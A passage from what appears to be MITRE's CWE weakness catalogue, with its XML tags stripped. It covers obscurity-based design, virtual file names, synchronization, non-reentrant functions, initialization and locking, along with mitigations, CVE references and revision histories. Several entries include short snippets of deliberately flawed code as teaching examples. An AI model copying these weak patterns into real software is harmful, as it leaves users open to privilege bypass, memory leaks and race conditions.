"hidden" form fields can be processed using a modified client. + https://www.cve.org/CVERecord?id=CVE-2006-6588 + + + CVE-2006-7142 + Hard-coded cryptographic key stored in executable program. + https://www.cve.org/CVERecord?id=CVE-2006-7142 + + + CVE-2005-4002 + Hard-coded cryptographic key stored in executable program. + https://www.cve.org/CVERecord?id=CVE-2005-4002 + + + CVE-2006-4068 + Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks. + https://www.cve.org/CVERecord?id=CVE-2006-4068 + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Note that there is a close relationship between this weakness and CWE-603 (Use of Client-Side Authentication). If developers do not believe that a user can reverse engineer a client, then they are more likely to choose client-side authentication in the belief that it is safe. + + + + Pascal Meunier + Purdue University + 2008-01-18 + Draft 8 + 2008-01-30 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Design Principle Violation: Reliance on Security through Obscurity + + + + The product violates well-established principles for secure design. + This can introduce resultant weaknesses or make it easier for developers to introduce related weaknesses during implementation. Because code is centered around design, it can be resource-intensive to fix design problems. + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Other + Other + + + + + Part 4-1 + Req SD-3 + + + Part 4-1 + Req SD-4 + + + Part 4-1 + Req SI-1 + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + CWE Community + 2008-01-30 + Draft 8 + 2008-01-30 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-31 + Suggested mappings to ISA/IEC 62443. + + + + + The product does not handle or incorrectly handles a file name that identifies a "virtual" resource that is not directly specified within the directory that is associated with the file name, causing the product to perform file-based operations on a resource that is not a file. + Virtual file names are represented like normal file names, but they are effectively aliases for other resources that do not behave like normal files. Depending on their functionality, they could be alternate entities. They are not necessarily listed in directories. + + + + + + + + + Implementation + + + Operation + + + + + Other + Other + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + File Processing + + + File or Directory + + + + Virtual Files + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Virtual Files + Failure to Handle File Names that Identify Virtual Resources + + + + The product utilizes multiple threads or processes to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes. + + Synchronization refers to a variety of behaviors and mechanisms that allow two or more independently-operating processes or threads to ensure that they operate on shared resources in predictable ways that do not interfere with each other. Some shared resource operations cannot be executed atomically; that is, multiple steps must be guaranteed to execute sequentially, without any interference by other processes. Synchronization mechanisms vary widely, but they may include locking, mutexes, and semaphores. When a multi-step operation on a shared resource cannot be guaranteed to execute independent of interference, then the resulting behavior can be unpredictable. Improper synchronization could lead to data or memory corruption, denial of service, etc. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Confidentiality + Other + Modify Application Data + Read Application Data + Alter Execution Logic + + + + + Implementation + Use industry standard APIs to synchronize your code. + + + + + SIG00-C + Mask signals handled by noninterruptible signal handlers + + + SIG31-C + Do not access shared objects in signal handlers + CWE More Abstract + + + State synchronization error + + + VNA03-J + Do not assume that a group of calls to independently atomic methods is atomic + + + SFP19 + Missing Lock + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. + + + + CWE Community + 2008-04-11 + Draft 9 + 2008-04-11 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Name, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2019-09-23 + updated Description, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Synchronization + + + + The product calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state. + + + + + + Implementation + + + + + Integrity + Confidentiality + Other + Modify Memory + Read Memory + Modify Application Data + Read Application Data + Alter Execution Logic + + + + + Implementation + Use reentrant functions if available. + + + Implementation + Add synchronization to your non-reentrant function. + + + Implementation + In Java, use the ReentrantLock Class. + + + + + CVE-2001-1349 + unsafe calls to library functions from signal handler + https://www.cve.org/CVERecord?id=CVE-2001-1349 + + + CVE-2004-2259 + SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. + https://www.cve.org/CVERecord?id=CVE-2004-2259 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2008-04-11 + Draft 9 + 2008-04-11 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, References + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-09-27 + updated Name, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Common_Consequences + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Use of a Non-reentrant Function in an Unsynchronized Context + Use of a Non-reentrant Function in a Multithreaded Context + + + + The product does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release. + + Resources often have explicit instructions on how to be created, used and destroyed. When code does not follow these instructions, it can lead to unexpected behaviors and potentially exploitable states. + Even without explicit instructions, various principles are expected to be adhered to, such as "Do not use an object until after its creation is complete," or "do not use an object after it has been slated for destruction." + + + + + + + + Implementation + + + + + Other + Other + + + + + Testing + Use Static analysis tools to check for unreleased resources. + + + + + FIO39-C + Do not alternately input and output from a stream without an intervening flush or positioning call + CWE More Abstract + + + + + + + + + + + Discouraged + This CWE entry is high-level when lower-level children are available. + Consider children or descendants of this entry instead. + + + + + + More work is needed on this entry and its children. There are perspective/layering issues; for example, one breakdown is based on lifecycle phase (CWE-404, CWE-665), while other children are independent of lifecycle, such as CWE-400. Others do not specify as many bases or variants, such as CWE-704, which primarily covers numbers at this stage. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Relationships, Type + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Insufficient Control of a Resource Through its Lifetime + + + + The product does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used. + This can have security implications when the associated resource is expected to have certain properties or values, such as a variable that determines whether a user has been authenticated or not. + + + + + + Primary + + + Resultant + + + + + + + + Implementation + This weakness can occur in code paths that are not well-tested, such as rare error conditions. This is because the use of uninitialized data would be noticed as a bug during frequently-used functionality. + + + Operation + + + Medium + + + Confidentiality + Read Memory + Read Application Data + When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party. + + + Access Control + Bypass Protection Mechanism + If security-critical decisions rely on a variable having a "0" or equivalent value, and the programming language performs this initialization on behalf of the programmer, then a bypass of security may occur. + + + Availability + DoS: Crash, Exit, or Restart + The uninitialized data may contain values that cause program flow to change in ways that the programmer did not intend. For example, if an uninitialized variable is used as an array index in C, then its previous contents may produce an index that is outside the range of the array, possibly causing a crash or an exit in other environments. + + + + + Automated Dynamic Analysis + + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Initialization problems may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + Moderate + + + Manual Dynamic Analysis + Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application's environment, it may still indicate unexpected conditions that were not handled by the application itself. + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, in Java, if the programmer does not explicitly initialize a variable, then the code could produce a compile-time error (if the variable is local) or automatically initialize the variable to the default value for the variable's type. In Perl, if explicit initialization is not performed, then a default value of undef is assigned, which is interpreted as 0, false, or an equivalent value depending on the context in which the variable is accessed. + + + + Architecture and Design + Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values. + + + Implementation + Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage. + + + Implementation + Pay close attention to complex conditionals that affect initialization, since some conditions might not perform the initialization. + + + Implementation + Avoid race conditions (CWE-362) during initialization routines. + + + Build and Compilation + Run or compile your product with settings that generate warnings about uninitialized variables or data. + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + + + Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached. + + private boolean initialized = true;public void someMethod() { + if (!initialized) { + + + // perform initialization tasks + ... + initialized = true; + } + + + + + + The following code intends to limit certain operations to the administrator only. + + $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} + + # do stuff + if ($uid == 0) {DoAdminThings();} + + If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. + + + The following code intends to concatenate a string to a variable and print the string. + + char str[20];strcat(str, "hello world");printf("%s", str); + + This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory. + If a null terminator is found before str[8], then some bytes of random garbage will be printed before the "hello world" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found. + If a null terminator isn't found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn't found before the end of the memory segment is reached, leading to a segmentation fault and crash. + + + + + CVE-2001-1471 + chain: an invalid value prevents a library file from being included, skipping initialization of key variables, leading to resultant eval injection. + https://www.cve.org/CVERecord?id=CVE-2001-1471 + + + CVE-2008-3637 + Improper error checking in protection mechanism produces an uninitialized variable, allowing security bypass and code execution. + https://www.cve.org/CVERecord?id=CVE-2008-3637 + + + CVE-2008-4197 + Use of uninitialized memory may allow code execution. + https://www.cve.org/CVERecord?id=CVE-2008-4197 + + + CVE-2008-2934 + Free of an uninitialized pointer leads to crash and possible code execution. + https://www.cve.org/CVERecord?id=CVE-2008-2934 + + + CVE-2007-3749 + OS kernel does not reset a port when starting a setuid program, allowing local users to access the port and gain privileges. + https://www.cve.org/CVERecord?id=CVE-2007-3749 + + + CVE-2008-0063 + Product does not clear memory contents when generating an error message, leading to information leak. + https://www.cve.org/CVERecord?id=CVE-2008-0063 + + + CVE-2008-0062 + Lack of initialization triggers NULL pointer dereference or double-free. + https://www.cve.org/CVERecord?id=CVE-2008-0062 + + + CVE-2008-0081 + Uninitialized variable leads to code execution in popular desktop application. + https://www.cve.org/CVERecord?id=CVE-2008-0081 + + + CVE-2008-3688 + chain: Uninitialized variable leads to infinite loop. + https://www.cve.org/CVERecord?id=CVE-2008-3688 + + + CVE-2008-3475 + chain: Improper initialization leads to memory corruption. + https://www.cve.org/CVERecord?id=CVE-2008-3475 + + + CVE-2008-5021 + Composite: race condition allows attacker to modify an object while it is still being initialized, causing software to access uninitialized memory. + https://www.cve.org/CVERecord?id=CVE-2008-5021 + + + CVE-2005-1036 + Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap + https://www.cve.org/CVERecord?id=CVE-2005-1036 + + + CVE-2008-3597 + chain: game server can access player data structures before initialization has happened leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2008-3597 + + + CVE-2009-2692 + chain: uninitialized function pointers can be dereferenced allowing code execution + https://www.cve.org/CVERecord?id=CVE-2009-2692 + + + CVE-2009-0949 + chain: improper initialization of memory can lead to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-0949 + + + CVE-2009-3620 + chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3620 + + + + + Incorrect initialization + + + ARR02-C + Explicitly specify array bounds, even if implicitly defined by an initializer + + + DCL00-J + Prevent class initialization cycles + + + SFP4 + Unchecked Status Condition + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2008-04-11 + Draft 9 + 2008-04-11 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Type + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Incorrect or Incomplete Initialization + + + + The product performs an operation on a resource at the wrong phase of the resource's lifecycle, which can lead to unexpected behaviors. + A resource's lifecycle includes several phases: initialization, use, and release. For each phase, it is important to follow the specifications outlined for how to operate on the resource and to ensure that the resource is in the expected phase. Otherwise, if a resource is in one phase but the operation is not valid for that phase (i.e., an incorrect phase of the resource's lifetime), then this can produce resultant weaknesses. For example, using a resource before it has been fully initialized could cause corruption or incorrect data to be used. + + + + + + Implementation + + + + + Other + Other + + + + + Architecture and Design + Follow the resource's lifecycle from creation to release. + + + + + FIO46-C + Do not access a closed file + CWE More Abstract + + + MEM30-C + Do not access freed memory + CWE More Abstract + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors. + + Locking is a type of synchronization behavior that ensures that multiple independently-operating processes or threads do not interfere with each other when accessing the same resource. All processes/threads are expected to follow the same steps for locking. If these steps are not followed precisely - or if no locking is done at all - then another process/thread could modify the shared resource in a way that is not visible or predictable to the original process. This can lead to data or memory corruption, denial of service, etc. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Resource Consumption (CPU) + Inconsistent locking discipline can lead to deadlock. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Libraries or Frameworks + Use industry standard APIs to implement locking mechanism. + + + + + In the following Java snippet, methods are defined to get and set a long field in an instance of a class that is shared across multiple threads. Because operations on double and long are nonatomic in Java, concurrent access may cause unexpected behavior. Thus, all operations on long and double fields should be synchronized. + + private long someLongValue;public long getLongValue() {return someLongValue;} + public void setLongValue(long l) {someLongValue = l;} + + + + This code tries to obtain a lock for a file, then writes to it. + + function writeToLog($message){$logfile = fopen("logFile.log", "a"); + //attempt to get logfile lock + if (flock($logfile, LOCK_EX)) {fwrite($logfile,$message); + // unlock logfile + flock($logfile, LOCK_UN);}else {print "Could not obtain lock on logFile.log, message not recorded\n";}}fclose($logFile); + + PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock(). + + + The following function attempts to acquire a lock in order to perform operations on a shared resource. + + void f(pthread_mutex_t *mutex) { + pthread_mutex_lock(mutex); + + /* access shared resource */ + + + pthread_mutex_unlock(mutex); + } + + However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. + In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. + + int f(pthread_mutex_t *mutex) { + int result; + result = pthread_mutex_lock(mutex);if (0 != result)return result; + + + /* access shared resource */ + + + return pthread_mutex_unlock(mutex); + } + + + + It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization... + + if (helper == null) { + synchronized (this) {if (helper == null) {helper = new Helper();}} + }return helper; + + The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called. + Suppose that helper is not initialized. Then, 